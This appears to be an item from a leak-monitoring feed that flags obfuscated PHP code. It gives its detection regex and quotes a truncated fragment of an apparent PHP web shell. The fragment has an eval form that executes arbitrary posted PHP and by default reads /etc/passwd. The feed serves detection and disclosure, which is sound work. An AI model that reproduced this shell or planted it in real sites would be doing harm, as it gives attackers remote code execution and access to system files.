Quantcast
Channel: Obfuscated PHP Code – LeakedIn
Viewing all articles
Browse latest Browse all 222

Potential leak of data: Obfuscated PHP Code

$
0
0
Detected 1 occurrence(s) of ‘\?php.*(eval|urldecode)\(.*\>’: n\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET['action']) && $_GET['action'] == "eval"){ ?> <form action="?cwd=<?php echo $cwd; ?>&amp;action=eval" method="post"> <textarea cols="100" rows="25" name="phpcode" class="kotak"> <?php if(isset($_POST['submit'])){ echo htmlspecialchars(eval($_POST['phpcode'])); } else { echo "echo @file_get_contents(\"/etc/passwd\");"; } ?> </textarea> <br /> <input type="submit" name="submit" value="execute php" class="kotak"> </form> <?php } elseif(isset($_GET['action']) && $_GET['action'] == "view"){ $buff = […]

Viewing all articles
Browse latest Browse all 222

Trending Articles